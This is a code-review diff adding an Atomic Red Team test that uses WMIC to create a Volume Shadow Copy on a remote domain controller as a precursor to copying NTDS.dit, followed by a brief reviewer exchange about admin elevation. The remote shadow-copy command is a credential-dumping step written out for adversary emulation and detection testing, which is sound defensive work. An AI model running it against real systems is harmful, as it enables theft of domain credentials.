atomics/T1003.003/T1003.003.yaml

```diff
@@ -138,6 +138,36 @@ atomic_tests:
     name: command_prompt
     elevation_required: true
 
+- name: Create Volume Shadow Copy remotely with WMI
+  auto_generated_guid: d893459f-71f0-484d-9808-ec83b2b64226
+  description: |
+    This test is intended to be run from a remote workstation with in a command prompt with domain admin context.
+
+    The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy.
+  supported_platforms:
+  - windows
+  input_arguments:
+    drive_letter:
+      description: Drive letter to source VSC (including colon and backslash)
+      type: String
+      default: 'C:\'
+    target_host:
+      description: IP Address / Hostname you want to target
+      type: String
+      default: localhost
+  dependencies:
+  - description: |
+      Target must be a Domain Controller
+    prereq_command: |
+      wmic /node:#{target_host} shadowcopy list brief
+    get_prereq_command: |
+      echo Sorry, can't connect to target host, check network, firewall or permissions
+  executor:
+    command: |
+      wmic /node:#{target_host} shadowcopy call create Volume=#{drive_letter}
+    name: command_prompt
+    elevation_required: true
```

Comment:
Do we really need to be local admin on the source workstation that runs the test?
I agree though that elevation is required on the target, but there's nothing in ART to express this.

Reply:
The elevation was only required to work with the previous default `target_host` (localhost) i'll change this accordingly